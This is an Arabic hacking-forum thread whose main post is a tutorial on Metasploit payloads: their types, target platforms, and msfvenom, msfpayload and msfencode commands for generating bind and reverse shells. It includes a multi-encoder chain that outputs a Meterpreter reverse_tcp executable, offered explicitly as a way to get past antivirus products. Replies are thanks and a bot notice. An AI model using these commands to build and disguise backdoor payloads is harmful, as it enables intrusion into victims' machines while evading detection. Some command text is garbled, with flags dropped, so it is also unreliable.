حالة الموضوع:
مغلق
  1. ĔvĭĻ

    ĔvĭĻ DeveloPer Plus

    الأنتساب:
    ‏12 ديسمبر 2012
    المشاركات:
    66
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ●¦ فـَلـسـطـيـنُ ¦●
    [​IMG]

    السلام عليكم و رحمتة الله و بركاتة

    كيفكم شباب

    ان شاء الله الكل بخير
    درس اليوم

    المرجع شامل عن البايلودات و انواعها و أشكالها و تشفيرها و قوتها

    payload

    البايلودات أشكال كثيرة و انواع كثيرة

    [​IMG]

    .. أنواعها ..

    Inline (Non Staged

    كود PHP:
    A single payload containing the exploit and full s h e ll code for the selected taskInline payloads are by design more stable than their counterparts because they contain everything all in oneHowever some exploits wont support the resulting size of these payloads.
    [​IMG]

    Staged

    كود PHP:
    Stager payloads work in conjunction with stage payloads in order to perform a specific taskA stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.
    [​IMG]

    Meterpreter

    كود PHP:
    Meterpreterthe short form of M e t a -Interpreter is an advancedmulti-faceted payload that operates via dll injectionThe Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drivemaking it very difficult to detect with conventional forensic techniquesScripts and plugins can be loaded and unloaded dynamically as required and Meterpreter development is very strong and constantly evolving.
    [​IMG]

    PassiveX

    كود PHP:
    PassiveX is a payload that can help in circumventing restrictive outbound firewallsIt does this by using an ActiveX control to create a hidden instance of Internet ExplorerUsing the new ActiveX controlit communicates with the attacker via HTTP requests and responses.
    [​IMG]


    NoNX

    كود PHP:
    The NX (No eXecutebit is a feature built into some CPUs to prevent code from executing in certain areas of memoryIn WindowsNX is implemented as Data Execution Prevention (DEP). The M e t a sploit NoNX payloads are designed to circumvent DEP.
    [​IMG]

    Ord

    كود PHP:
    Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantagesThe advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return addressThey are also extremely tinyHowever two very specific disadvantages make them not the default choiceThe first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitationThe second being that it's a bit less stable than the other stagers
    .

    [​IMG]

    IPv6

    كود PHP:
    The Metasploit IPv6 payloads, as the name indicatesare built to function over IPv6 networks
    .

    [​IMG]


    Reflective DLL injection

    كود PHP:
    Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memorynever touching the host hard driveThe VNC and Meterpreter payloads both make use of reflective DLL injectionYou can read more about this from Stephen Fewerthe creator of the reflective DLL injection method
    .

    [​IMG]

    أشكالها

    aix

    bsd

    bsdi

    cmd

    generic

    java

    linux

    netware

    osx

    php

    solaris

    tty

    windows

    [​IMG]

    و لصنعها تقدر بطرق كثيرة

    مثل

    كود PHP:
    Msfvenom
    مثل

    كود PHP:
    msfvenom -p windows/s h e ll/bind_tcp -e x86/shikata_ga_nai -'\x00' -i 3
    او

    كود PHP:
    Msfconsole
    مثل

    كود PHP:
    msf payload(s h e ll_bind_tcp) > generate
    كود PHP:
    msf  payload(s h e ll_bind_tcp) > generate -'\x00'
    كود PHP:
    msf  payload(s h e ll_bind_tcp) > generate -'\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b
    '

    او

    كود PHP:
    Msfpayload
    مثل

    كود PHP:
    msfpayload windows/s h e ll_bind_tcp EXITFUNC=seh LPORT=1234 C
    و التخطي انواع

    مثل

    كود PHP:
    https
    كود PHP:
    http
    [​IMG]


    للتشفر طرق كثيرة

    اولاً نبدأ بالتشفير بــMetasploit

    encodes

    أنواعها

    كود PHP:
    cmd/generic_sh
    cmd
    /ifs
    cmd
    /printf_php_mq
    generic
    /none
    mipsbe
    /longxor
    mipsle
    /longxor
    php
    /base64
    ppc
    /longxor
    ppc
    /longxor_tag
    sparc
    /longxor_tag
    x64
    /xor
    x86/alpha_mixed
    x86
    /alpha_upper
    x86
    /avoid_underscore_tolower
    x86
    /avoid_utf8_tolower
    x86
    /call4_dword_xor
    x86
    /context_cpuid
    x86
    /context_stat
    x86
    /context_time
    x86
    /countdown
    x86
    /fnstenv_mov
    x86
    /jmp_call_additive
    x86
    /nonalpha
    x86
    /nonupper
    x86
    /shikata_ga_nai
    x86
    /single_static_bit
    x86
    /unicode_mixed
    x86
    /unicode_upper
    [​IMG]

    و تختلف على حسب قوتها و نوع البايلود المراد تشفيرة

    التشفير بــencode

    encode ليس برنامج تشفير

    هو يغير القيم في البايلود

    تحتاج الى شفرة خاصه فيك


    اديك مثل

    مرات التشفير- encodes - antivirs

    كود PHP:
    AhnLab-V3 cmd/generic_sh 1
    AntiVir cmd
    /ifs 5
    Antiy
    -AVL cmd/printf_php_mq 10
    Avast generic
    /none 25
    Avast7 mipsbe
    /longxor 100
    AVG mipsle
    /longxor
    </span>


    هذي شفرة قديمة كنت استخدمها

    لدمج التشفير

    مثلا

    كود PHP:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R msfencode -e x86/shikata_ga_nai -c 5-t  raw msfencode -e x86/alpha_upper -c 2 -t raw msfencode -e  x86/shikata_ga_nai -c 5 -t raw msfencode -e x86/countdown -c 5 -t exe  -/root/payload3.exe
    و تقدر تشفر بطرق أخرى

    مثل

    Hex + هندسة عكسية

    و الباك دور و shell code

    ليس لــ Metasploit فقط

    shell هو الحصري

    و هذا الدرس تمهيد للدروس القادمة &:"


    [​IMG]
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. яσ¢к нα¢кєя

    яσ¢к нα¢кєя Developer

    الأنتساب:
    ‏24 مارس 2012
    المشاركات:
    67
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Taif
    رد: المرجع شامل عن البايلودات و انواعها و أشكالها و تشفيرها و قوتها

    شكرأ المجهودك المميز اخي


    :{12}: ​
     
  4. T H E P U N I S H E R

    T H E P U N I S H E R .:: فريــق الدعم الفني ::. مساعد مشرف

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    316
    الإعجابات المتلقاة:
    1,241
    نقاط الجائزة:
    93
    الإقامة:
    Egypt (●̪•)
    رد: المرجع شامل عن البايلودات و انواعها و أشكالها و تشفيرها و قوتها

    وعليكم السلام ورحمة الله

    يعطيك العافية يا رب
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة